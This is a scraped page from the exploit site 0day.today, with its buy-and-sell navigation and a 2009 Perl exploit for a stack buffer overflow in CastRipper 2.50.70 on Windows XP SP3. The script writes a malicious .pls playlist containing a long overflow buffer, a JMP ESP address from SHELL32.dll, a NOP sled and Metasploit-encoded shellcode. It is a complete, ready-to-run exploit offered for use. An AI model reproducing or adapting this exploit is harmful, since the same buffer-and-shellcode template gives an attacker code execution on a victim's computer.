0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
CastRipper 2.50.70 (.pls) Stack buffer Overflow Exploit WinXP SP3
================================================================= CastRipper 2.50.70 (.pls) Stack buffer Overflow Exploit WinXP SP3 ================================================================= # Title: CastRipper 2.50.70 (.pls) Stack buffer Overflow Exploit WinXP SP3 # CVE-ID: () # OSVDB-ID: () # Author: d3b4g # Published: 2009-12-24 # Verified: yes view source print? #!/usr/bin/perl # CastRipper 2.50.70 (.pls)Stack buffer Overflow Exploit WinXP SP3 # Exploite By : d3b4g # my webpage www.d3b4g.info # From tiny islands of maldivies # Tested on Windows XP SP3 # 24.12.2009 # I used Adress from SHELL32.dll.You can change it to your desired address.Use jmpfind.exe to find address. print "CastRipper 2.50.70 (.pls) Stack buffer Overflow Exploit\n"; print "Exploit By : d3b4g"; my $file= "d3b4g.pls"; my $junk= "A" x 26076; my $eip = pack('V',0x7D113B1F); # JMP ESP from SHELL32.dll WinXP SP3 my $shellcode = "\x90" x 25; # NOPs # windows/exec - 144 bytes # Thanks to http://www.metasploit.com # Encoder: x86/shikata_ga_nai # EXITFUNC=seh, CMD=calc $shellcode = $shellcode . "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" . "\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" . "\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" . "\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" . "\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" . "\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" . "\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" . "\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" . "\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" . "\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" . "\x7f\xe8\x7b\xca"; open($FILE,">$file"); print $FILE $junk.$eip.$shellcode; close($FILE); print "pls File Created successfully\n"; # 0day.today [2024-07-07] #